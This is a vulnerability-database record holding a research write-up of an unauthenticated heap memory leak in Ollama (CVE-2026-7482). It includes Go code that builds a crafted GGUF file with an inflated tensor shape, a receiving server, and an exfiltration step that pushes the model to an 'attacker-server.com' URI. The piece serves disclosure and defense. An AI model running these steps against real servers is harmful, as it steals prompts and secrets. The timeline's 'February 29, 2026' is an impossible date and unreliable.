{"uuid": "f6d41719-7e76-40c7-ac12-d7d70f2ac1db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Bleeding Llama: Critical Unauthenticated Memory Leak in Ollama - cyera.com article", "description": "# Bleeding Llama: Critical Unauthenticated Memory Leak in Ollama | Cyera Research\nTL;DR\n-----\n\nRef: [https://www.cyera.com/research/bleeding-llama-critical-unauthenticated-memory-leak-in-ollama](https://www.cyera.com/research/bleeding-llama-critical-unauthenticated-memory-leak-in-ollama)\n\n\nWe discovered a critical vulnerability (CVE-2026\u20137482, CVSS 9.1) in Ollama that enables unauthenticated attackers to leak the entire Ollama process memory, potentially impacting **300,000** servers globally.  \nThe leaked memory contains user messages (prompts), system prompts, and environment variables.\n\nWhat Is Ollama, Exactly?\n------------------------\n\nOllama is an open-source platform that lets you run LLMs directly on your own machine instead of relying on cloud services like _OpenAI_, _Anthropic_, or _xAI_.  \nWith Ollama, you can download, manage, and interact with models like _Llama_, _Mistral_, and others \u2014 all running locally on your hardware.\n\nWith roughly 170,000 stars on GitHub, over 100 million downloads on Docker Hub, and wide adoption across enterprises, Ollama has become the standard for running open-source models locally.\n\nCreating model instances in Ollama\n----------------------------------\n\nCreating model instances in Ollama can be done in two main ways\n\nThe first is using `/api/pull` API endpoint \u2014 this downloads an existing model from the Ollama registry and makes it available locally.  \nYou get a ready-made model (like `llama3` or `mistral`) that you can use right away for inference.  \nIt\u2019s the simplest approach when you don\u2019t need customization.\n\nThe second way is using `/api/create` API endpoint \u2014 this lets you build custom model instances by specifying configuration parameters like system prompts, quantization levels, and more.  \nThe base model can come from two sources \u2014 either pulled from a remote registry (via the `from` parameter), or built from previously uploaded model files.\n\nIn this research, we\u2019ll focus on the second option \u2014 how users create models from previously uploaded files.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128144_7b3dd88a.png)\n\nBut first \u2014 how do users upload files in the first place?\n\nFiles get uploaded to the Ollama server through the `/api/blobs/sha256:[sha256-digest]` API endpoint.  \nThe `[sha256-digest]` part is exactly what you\u2019d expect \u2014 a SHA-256 hash calculated from the file\u2019s content.  \nThe actual file content gets sent in the HTTP body of the request.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f9cad3d5e8f2d1fc7b35f1_1*dpka27K8NgwpPA42j_UBEw.png)\n\nAfter that, to create a model instance in Ollama, the user calls `/api/create` with the uploaded files as parameters in the JSON request body.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512815f_e894cd0d.png)\n\nthe breakdown of the API request to `/api/create` will be explained later in this article.\n\n### **Disclaimer**\n\n**\u200d**_The next section is a bit technical. We\u2019ve kept it as simple as possible and only included what\u2019s necessary to understand the vulnerability. 
\n\n### **Disclaimer**\n\n_The next section is a bit technical. We\u2019ve kept it as simple as possible and only included what\u2019s necessary to understand the vulnerability. So please bear with us - we promise the vulnerability part is worth it._\n\nGGUF (GPT-Generated Unified Format)\n-----------------------------------\n\nGGUF is a file format used to store large language models in a way that makes them efficient to load and run locally.\n\nA GGUF file contains tensors \u2014 which are basically multi-dimensional arrays of numbers that represent the model\u2019s learned parameters (weights). Think of tensors as the \u201cbrain\u201d of the model \u2014 they store all the knowledge the model has learned during training.\n\nThe header of a GGUF file contains data that describes it, like the version of the GGUF format, the number of tensors it contains, and some key-value metadata.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128147_0f992bfc.png)\n\nOne metadata field worth mentioning is `general.file_type` \u2014 this tells you (shocking) the file type of the GGUF, which determines how the numbers inside the tensors are stored.  \nFor this research, we only care about F16 (float-16) and F32 (float-32).\n\nAfter the GGUF header comes a list of tensor objects. Each one stores the tensor\u2019s name, number of dimensions, data type (precision info), and an offset that points to where the actual tensor data lives later in the file.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512815c_88102861.png)
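\n\nTo make that layout tangible, here is a small Go sketch that reads just the fixed-size part of the header. The field order and little-endian encoding follow the public GGUF spec; `model.gguf` is a placeholder path.\n\n```go\npackage main\n\nimport (\n    \"encoding/binary\"\n    \"fmt\"\n    \"os\"\n)\n\n// The fixed-size fields at the very start of every GGUF file,\n// per the public GGUF spec (all values little-endian).\ntype ggufHeader struct {\n    Magic       [4]byte // the ASCII bytes \"GGUF\"\n    Version     uint32  // GGUF format version\n    TensorCount uint64  // number of tensor descriptors in the file\n    MetadataKV  uint64  // number of key-value metadata entries\n}\n\nfunc main() {\n    f, err := os.Open(\"model.gguf\")\n    if err != nil {\n        panic(err)\n    }\n    defer f.Close()\n\n    var h ggufHeader\n    if err := binary.Read(f, binary.LittleEndian, &h); err != nil {\n        panic(err)\n    }\n    if string(h.Magic[:]) != \"GGUF\" {\n        panic(\"not a GGUF file\")\n    }\n    fmt.Printf(\"version=%d tensors=%d metadata entries=%d\\n\", h.Version, h.TensorCount, h.MetadataKV)\n}\n```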
\n\nQuantization\n------------\n\nQuantization is the process of reducing the precision of numbers stored in tensors, making the model smaller and faster to run \u2014 at the cost of some accuracy.\n\nIn GGUF, the F32 file type stores each number using 4 bytes, while F16 uses only 2 bytes.  \nMoving from F32 to F16 cuts memory usage in half (making the model run faster), but comes with permanent data loss \u2014 some decimal precision is gone and can\u2019t be recovered. Going the other way, from F16 to F32, involves no data loss at all.\n\nThe Vulnerability\n-----------------\n\n### Before We Start\n\nFor those of you familiar with Go, you\u2019re probably wondering \u2014 how is an out-of-bounds memory vulnerability even possible in a memory-safe language? Normally, Go would just panic and crash.\n\nThe answer is the `unsafe` package. Go gives developers an escape hatch for low-level memory operations, and as the name suggests, all the usual safety guarantees go out the window. Unsurprisingly, the one place Ollama uses `unsafe` is exactly where this vulnerability lives.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128153_2b61be86.jpeg)\n\n### Creating Models. Again.\n\nAs we mentioned at the start of this article, there are a few ways to create a model instance in Ollama. The one we\u2019re focusing on is through the `/api/create` endpoint.\n\nThe function that handles incoming requests to this endpoint is `server.CreateHandler`.\n\nThe first thing it does is parse the incoming request based on a known structure. This structure contains many properties, but the ones we care about for this vulnerability are the model name (`model`), the uploaded files that will construct the model (`files`), and the `quantize` parameter, which we'll explain later.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512814d_2badc813.png)\n\nAfter parsing, the function does some basic sanity checks \u2014 it verifies that the model name is valid and the file paths are legitimate (no path-traversal attempts, and the files actually exist on disk).\n\nNext, if the model creation is using files (and not, say, a URL), the function calls `convertModelFromFiles`.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128156_338cea75.png)\n\n### Create a Model from a GGUF File\n\nWhen you call `/api/create` to create a model from an uploaded file, Ollama first needs to figure out what kind of file you gave it \u2014 it does this by checking the file extension (`.gguf`, `.safetensors`), or if there isn't one, by peeking at the first few bytes.\n\nFor GGUF file formats, Ollama parses the raw GGUF file into an internal struct called a **Layer**, which holds both the file metadata and the model\u2019s tensors.  \nFrom this point on, Ollama works with the Layer rather than the raw file.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128159_c6424aa5.png)\n\nNext, `createModel` is called to orchestrate the model creation.  \nBefore actually saving the model, Ollama checks whether quantization is needed.\n\n_Quick reminder: quantization converts a tensor\u2019s data from one format to another (F32, F16, etc.)._\n\nQuantization only runs if three conditions are met: the user explicitly requested a target format (via the `quantize` parameter), the file is a GGUF, and the current format is different from the requested one.  \nIf the model is already in the right format, nothing happens.\n\nIf quantization is needed, the process looks like this:\n\nFirst, a new Layer is prepared by copying each tensor\u2019s metadata \u2014 things like shape and type \u2014 but leaving the actual data out. Think of it as setting up empty slots for the new tensors.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512814a_f7404e4f.png)\n\nThen, for each tensor, `WriteTo` is called \u2014 the function responsible for the actual mathematical conversion from the source type to the destination type.\n\nFor optimization reasons, it first converts the source data to F32, and then from F32 to the destination format. By always going through F32 as a middle step, you only need two conversion functions per format instead of a direct path between every possible pair.
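\n\nAs a rough illustration of why the middle step pays off, here is a pure-Go sketch of that pipeline. This is not Ollama\u2019s actual code (the real conversions happen inside ggml, reached through cgo); the function names are invented for the example, and only the F16-to-F32 half is fleshed out. With N supported formats, routing everything through F32 needs only a to-F32 and a from-F32 function per format, roughly 2N functions instead of N\u00b2 direct converters.\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"math\"\n)\n\n// fp16ToFp32 expands one IEEE-754 half-precision value to float32 (lossless).\nfunc fp16ToFp32(h uint16) float32 {\n    sign := uint32(h>>15) & 1\n    exp := uint32(h>>10) & 0x1f\n    frac := uint32(h) & 0x3ff\n    var bits uint32\n    switch {\n    case exp == 0 && frac == 0: // signed zero\n        bits = sign << 31\n    case exp == 0: // subnormal: renormalize into float32's wider exponent range\n        e := uint32(113) // 127 (f32 bias) - 15 (f16 bias) + 1\n        for frac&0x400 == 0 {\n            frac <<= 1\n            e--\n        }\n        bits = sign<<31 | e<<23 | (frac&0x3ff)<<13\n    case exp == 0x1f: // Inf / NaN\n        bits = sign<<31 | 0xff<<23 | frac<<13\n    default: // normal number: rebias the exponent, widen the mantissa\n        bits = sign<<31 | (exp+112)<<23 | frac<<13\n    }\n    return math.Float32frombits(bits)\n}\n\n// convert runs the two-step pipeline: source type -> F32 -> target type.\nfunc convert(src []uint16, toF32 func(uint16) float32, fromF32 func(float32) float32) []float32 {\n    out := make([]float32, len(src))\n    for i, v := range src {\n        out[i] = fromF32(toF32(v))\n    }\n    return out\n}\n\nfunc main() {\n    // Target F32: the second step is a plain copy, i.e. the identity.\n    identity := func(f float32) float32 { return f }\n    fmt.Println(convert([]uint16{0x3c00, 0xc000, 0x3555}, fp16ToFp32, identity)) // [1 -2 0.33325195]\n}\n```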
\n\nIf the target type is F32, this middle step just copies the data directly (there is no need to do any type of conversion).\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128162_9a783273.png)\n\nThen the `WriteTo` function passes the converted F32 tensor to `ggml.Quantize`, which handles the final conversion from F32 to the target format.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128165_2bd13fe3.png)\n\nOnce all tensors are converted, a new GGUF file is written with the updated header and the newly quantized tensors \u2014 and the model is ready to use.\n\n### Finally, The Bug\n\nLet\u2019s take a closer look at `WriteTo`.\n\nAs mentioned, `WriteTo` starts by converting the source data to F32.  \nIf the source is already F32, it simply copies the tensor data from the original buffer; otherwise, it calls `ggml.ConvertToF32`.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128168_5e9bd2d1.png)\n\nAs you can see, the `ConvertToF32` function takes three parameters: the original data buffer, the source type, and `q.from.Elements()`.\n\nThat third parameter is worth pausing on.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512816b_f7910c27.png)\n\n`Elements()` returns the total number of elements in a tensor.  \nRemember \u2014 tensors are multi-dimensional \u2014 their shape describes their dimensions.  \n`Elements()` simply multiplies those dimensions together. A tensor with shape (3, 3, 3), for example, has 27 elements.\n\nNow, let\u2019s return to the `ConvertToF32` function.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512816e_721f69af.png)\n\nThese functions look scary, but `ConvertToF32` is actually pretty simple \u2014 it just calls the appropriate conversion function based on the source type. For example, if the source is F16, it calls `ggml_fp16_to_fp32_row` with three parameters: a pointer to the original data, an output buffer where the converted data will be written, and the number of elements to read \u2014 which comes from `Elements()`.\n\nFrom there, `ggml_fp16_to_fp32_row` loops over the buffer and reads exactly that many elements, converting each one to F32.\n\n**So what\u2019s the problem?**  \nGGUF is just a binary format \u2014 anyone can create one manually and set the tensor\u2019s shape to whatever they want. There\u2019s no validation that the number of elements we\u2019re about to read actually matches the real size of the data.\n\nSo if an attacker puts a very large number in the shape field, the loop will blindly read past the end of the buffer \u2014 that\u2019s our out-of-bounds heap read.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128171_9d3843ea.png)\n\nAt this point, the output buffer contains more than just the model data \u2014 it also includes whatever happened to be sitting in heap memory right after the buffer. As we\u2019ll show later, this can contain some pretty sensitive stuff: system prompts and messages from other users sent to other models.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128174_b9a36107.png)\n\nSo what does Ollama do with this output buffer? As mentioned earlier, it converts it from F32 to the target format, and then writes the whole thing to disk as the new model file \u2014 sensitive data and all.
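\n\nThe vulnerable pattern boils down to trusting an attacker-controlled element count when reinterpreting a raw buffer. The following deliberately broken Go sketch is our own construction, not Ollama\u2019s code; it shows the shape of the bug and the one-line bounds check that would prevent it.\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"unsafe\"\n)\n\nfunc main() {\n    // The uploaded tensor data: four F16 values (1.0, 2.0, 3.0, 4.0), i.e. 8 bytes.\n    data := []byte{0x00, 0x3c, 0x00, 0x40, 0x00, 0x42, 0x00, 0x44}\n\n    // The element count comes straight from the attacker-controlled shape\n    // in the GGUF header; nothing checks it against len(data).\n    claimed := 1024\n\n    // Reinterpreting the buffer with the declared count is where Go's safety\n    // guarantees disappear: the resulting slice extends 2040 bytes past the\n    // end of data, into whatever else happens to live on the heap.\n    elems := unsafe.Slice((*uint16)(unsafe.Pointer(&data[0])), claimed)\n\n    // Any index above 3 is an out-of-bounds heap read.\n    fmt.Printf(\"elems[500] = %#04x (leaked heap bytes)\\n\", elems[500])\n\n    // The missing check that closes the hole:\n    //   if claimed*2 > len(data) { /* reject: shape exceeds data size */ }\n}\n```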
\n\n### Leaking the Data Without Breaking It\n\nThe data read from the heap goes through multiple conversions before being written to disk \u2014 and that\u2019s a problem.  \nMost quantization formats are lossy, meaning the data gets corrupted and becomes unreadable.\n\nTo keep the data intact, we use a simple trick: set the tensor type to F16 and request F32 as the target format. F16 to F32 is a lossless conversion (2 bytes to 4 bytes), so the heap data comes out readable on the other side.  \nAnd since the target is already F32, the second conversion does nothing at all. The data lands on disk exactly as it was in memory.\n\nExfiltrating the data\n---------------------\n\nSo we have a model file with leaked heap data sitting on the server - now what? Without a way to get it back, the out-of-bounds read is pretty useless. So how do we bring it home?\n\nEarlier in this post we talked about the different ways to create models in Ollama - from local files, and also by pulling from a registry using `/api/pull`. Well, it turns out Ollama also lets you go the other direction: pushing a model to a registry using `/api/push`.\n\nThe `/api/push` endpoint accepts a few parameters, one of them being `model` - the name of the model to upload. The function that handles this request is `PushHandler`. The first thing it does is check whether a model with that name exists on disk. If it does, it calls `PushModel` to handle the upload.\n\nHere\u2019s where it gets interesting. `PushModel` starts by parsing the model name - and if the name looks like an HTTP URI, it will push the entire model to that URI.\n\nNow you might be thinking - \u201cBut we created the model from a file, not a URI. How can the name be a URI?\u201d\n\nThe thing is \u2014 there\u2019s no validation preventing it. You can create a model via `/api/create` (with files) and set the model name to something like `http://attacker-server.com/namespace/model:tag`, then call `/api/push` with that same name, and Ollama will happily upload the model \u2014 leaked heap data and all \u2014 straight to your server.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128177_eb199852.png)\n\nExploitation\n------------\n\nIn this section we\u2019ll walk through a real exploitation of the bug - what can be extracted, and just how easy the entire attack is.\n\nFirst, let\u2019s set the scene. We have a running Ollama instance with the `llama3.1` model installed. Three different users are interacting with this model from their own machines - sending messages, getting responses.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512817a_d28b1d8a.png)\n\nNow, the attacker sends a crafted GGUF file to the Ollama server \u2014 the tensor\u2019s shape is set to 1 million elements, while the actual data is only a fraction of that size.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512817d_bffbba21.png)
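\n\nFor illustration, here is a Go sketch of how such a file could be put together. It is a simplified rendering of the trick rather than a working exploit: a real file needs the metadata Ollama expects before the model is accepted, and the alignment and type-enum values follow the public GGUF spec. The essential part is the F16 tensor whose declared dimension far exceeds the data actually attached.\n\n```go\npackage main\n\nimport (\n    \"bytes\"\n    \"encoding/binary\"\n    \"os\"\n)\n\n// writeString emits a GGUF string: a uint64 length followed by the raw bytes.\nfunc writeString(b *bytes.Buffer, s string) {\n    binary.Write(b, binary.LittleEndian, uint64(len(s)))\n    b.WriteString(s)\n}\n\nfunc main() {\n    le := binary.LittleEndian\n    var b bytes.Buffer\n\n    // Header: magic, version, tensor count, metadata key-value count.\n    b.WriteString(\"GGUF\")\n    binary.Write(&b, le, uint32(3)) // GGUF version\n    binary.Write(&b, le, uint64(1)) // one tensor\n    binary.Write(&b, le, uint64(0)) // no metadata (a real file needs some)\n\n    // Tensor descriptor: an F16 tensor with a wildly inflated shape.\n    writeString(&b, \"t0\")\n    binary.Write(&b, le, uint32(1))         // number of dimensions\n    binary.Write(&b, le, uint64(1_000_000)) // claimed element count: 1M\n    binary.Write(&b, le, uint32(1))         // ggml type 1 = F16\n    binary.Write(&b, le, uint64(0))         // offset into the data section\n\n    // Tensor data starts at the default 32-byte alignment boundary.\n    for b.Len()%32 != 0 {\n        b.WriteByte(0)\n    }\n\n    // Attach only 64 bytes of data, not the 2,000,000 the shape promises.\n    // Everything read beyond these bytes comes from the server's heap.\n    b.Write(make([]byte, 64))\n\n    if err := os.WriteFile(\"evil.gguf\", b.Bytes(), 0o644); err != nil {\n        panic(err)\n    }\n}\n```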
\n\nNext, the attacker creates the model \u2014 triggering the out-of-bounds read. The model name is set to a controlled server domain, which will be used to exfiltrate the leaked data in the next step.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512818e_1df066c0.png)\n\nNow, before we use the `/api/push` API to exfiltrate the data, we need to set up a receiving server that knows how to communicate over the protocol Ollama uses.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512818b_b3826ab0.png)
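\n\nIn a lab setup, something like the Go sketch below can stand in for that server. Treat it as an assumption-heavy placeholder rather than a faithful implementation: Ollama pushes over a registry-style protocol (blob uploads plus a manifest), and a real receiver may need the proper status codes and `Location` headers for the upload handshake. This one simply logs every request and writes any uploaded body to disk.\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"io\"\n    \"log\"\n    \"net/http\"\n    \"os\"\n)\n\nfunc main() {\n    uploads := 0\n    // Catch-all handler: log each request the pushing client makes and keep\n    // whatever it uploads; the leaked model layers end up in these bodies.\n    http.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\n        log.Printf(\"%s %s (%d bytes)\", r.Method, r.URL.Path, r.ContentLength)\n        switch r.Method {\n        case http.MethodPost, http.MethodPut, http.MethodPatch:\n            uploads++\n            f, err := os.Create(fmt.Sprintf(\"upload-%03d.bin\", uploads))\n            if err != nil {\n                http.Error(w, err.Error(), http.StatusInternalServerError)\n                return\n            }\n            defer f.Close()\n            io.Copy(f, r.Body)\n        }\n        w.WriteHeader(http.StatusOK)\n    })\n    log.Fatal(http.ListenAndServe(\":8080\", nil))\n}\n```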
\n\nFinally, we use `/api/push` to push the model to our controlled server - and just like that, the model file containing the leaked heap data arrives on the other end.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128188_d9beeb82.png)\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128185_2438d390.png)\n\nAnd there it is \u2014 the model file is now on our server. By reversing the quantization, we can read the raw heap data. Let\u2019s take a look at what was hiding in there.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128191_4cb75d79.png)\n\nAs you can see, the leaked data contains user prompts, system prompts from other models, and even environment variables from the machine running the Ollama server - all highly sensitive information, now exposed with just three API calls.\n\nImpact\n------\n\nOllama, when launched, listens on all interfaces (0.0.0.0) by default with no authentication. Today, there are roughly **300,000 exposed servers** on the internet. This means threat actors can exploit this vulnerability without any credentials \u2014 using only three API calls, they can extract the entire heap memory of the Ollama process.\n\nAs we showed above, this memory contains user messages (prompts), system prompts, and environment variables from the host machine running Ollama.\n\nNow imagine a large enterprise with 10,000+ employees using Ollama as their AI \u201cchat.\u201d Think about how much sensitive data flows into the Ollama server. An attacker can learn basically anything about the organization from its AI inference traffic \u2014 API keys, proprietary code, customer contracts, and much more.\n\nOn top of that, engineers often connect Ollama to tools like Claude Code. In those cases, the impact is even higher - all tool outputs flow to the Ollama server, get saved in the heap, and potentially end up in an attacker\u2019s hands.\n\nThe risk is immense, and every organization needs to mitigate this immediately.\n\nDisclosure Timeline\n-------------------\n\n*   **February 2, 2026:** Vulnerability reported to Ollama.\n*   **February 13, 2026:** Researcher followed up requesting acknowledgement.\n*   **February 25, 2026:** Ollama acknowledged the vulnerability and shared a PR with a proposed fix.\n*   **February 25, 2026:** Researcher confirmed the fix was valid and asked about CVE submission.\n*   **February 25, 2026:** Ollama asked the researcher to submit the CVE independently.\n*   **February 26, 2026:** Researcher followed up proposing GitHub Security Advisories as a faster alternative to MITRE, warning that releasing a fix without explicitly flagging it as a security patch leaves users unaware of the urgency \u2014 exposing them to active exploitation risk if they don\u2019t prioritize the update.\n*   **February 29, 2026:** Researcher followed up requesting a status update.\n*   **March 2, 2026:** Researcher submitted a CVE request through MITRE.\n*   **March 26, 2026:** Researcher followed up with MITRE requesting a status update on the CVE submission.\n*   **April 26, 2026:** With no resolution from MITRE, researcher approached [Echo](https://www.echo.ai/blog/cve-2026-7482-ollama-vulnerability), a third-party CVE Numbering Authority, to request CVE assignment.\n*   **April 28, 2026:** Echo acknowledged the report, assigned CVE-2026-7482 to the vulnerability, and notified Ollama for visibility.\n*   **May 1, 2026:** CVE was published.\n*   **May 2, 2026:** Cyera published this blog post.\n\nAcknowledgment\n--------------\n\nCyera Research would like to extend our sincere thanks to [Echo](https://www.echo.ai/blog/cve-2026-7482-ollama-vulnerability) for their support and partnership throughout this research. Their contribution was instrumental in bringing this work to light, and we're grateful for their commitment to advancing security for the broader community.", "description_format": "markdown", "vulnerability": "CVE-2026-7482", "creation_timestamp": "2026-05-06T06:28:08.638804+00:00", "timestamp": "2026-05-06T06:28:08.638804+00:00", "related_vulnerabilities": ["CVE-2026-7482"], "meta": [{"tags": ["vulnerability:exploitability=documented"]}], "author": {"login": "adulau", "name": "Alexandre Dulaunoy", "uuid": "c933734a-9be8-4142-889e-26e95c752803"}}
